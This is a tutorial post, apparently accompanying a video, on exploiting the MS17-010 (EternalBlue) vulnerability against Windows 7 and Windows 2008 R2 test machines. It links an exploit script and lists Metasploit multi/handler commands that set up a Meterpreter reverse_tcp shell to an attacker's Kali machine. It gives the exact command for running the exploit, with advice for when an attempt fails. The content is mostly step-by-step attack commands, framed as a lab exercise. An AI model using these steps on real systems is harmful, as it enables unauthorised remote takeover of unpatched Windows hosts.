MS17-010 Vulnerability - EternalBlue exploit using a binary payload and python script on Windows 7 and Windows 2008 R2 targets

In this video we exploit the MS17-010 vulnerability (EternalBlue) on Windows 7 and Windows 2008 R2 targets. We use the shellcode (binary payloads) that we previously generated, together with a Python script and the Metasploit Framework.

Please check my previous post on generating the shellcode:
Generating shellcode - using msfvenom to generate a binary payload

We also need Worawit's eternalblue7_exploit.py Python script, which can be downloaded from the following GitHub URL:
https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a

Before starting the actual target exploitation, we need to configure the multi handler exploit module in the Metasploit Framework. The multi handler runs in listening mode and is required in order to establish the Meterpreter session between the attacker machine (Kali Linux) and the target machine (Windows). It is essential to configure the multi handler with the same Metasploit payload, LHOST and LPORT values that were used when generating the shellcode with the msfvenom utility (for details, see the "Generating shellcode" post linked above).

The following Metasploit commands were used:
use exploit/multi/handler
This command selects the multi handler exploit module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp payload.
set EXITFUNC thread
This command configures the payload to use the Thread exit method, by calling ExitThread().
set lhost <Kali_Linux_IP>
This command sets the listening IP address (192.168.254.142).
set lport 4444
This command sets the listening port value.
show options
This command displays the basic options available for the selected module.
show advanced
This command displays the advanced options available for the selected module.
set ExitOnSession false
This command will allow the multi handler exploit to continue to run in listening mode, even if an established Meterpreter session is closed.
exploit -j
This command will launch the multi handler exploit and run it in the context of a job.
sessions -l
This command displays information about the active sessions.
sessions -i <Session_number>
This command starts interaction with the specified session.
sysinfo
This Meterpreter command displays information about the target system (available once exploitation has succeeded and a Meterpreter session has been established).
getuid
This Meterpreter command displays the user account the Meterpreter session is running as on the target.
exit
This Meterpreter command closes the current Meterpreter session.
jobs
This command displays information about the active jobs running in the background.
jobs -K
This command terminates all running jobs.

The command used for running the EternalBlue exploit script is:
python eternalblue7_exploit.py <Target_IP> <shellcode_file> [numGroomConn]
where:
<Target_IP> - the IP address of the test Windows 7 machine (192.168.254.70) or of the test Windows 2008 R2 machine (192.168.254.99)
<shellcode_file> - either sc_x64.bin (the binary payload without a NOP sled) or sc_x64_100n.bin (the binary payload with a NOP sled)
[numGroomConn] - an optional parameter with a default value of 13. It is used by the EternalBlue exploit script for the buffer overflow attack. If the exploit fails but the target does not crash, try increasing the "numGroomConn" value.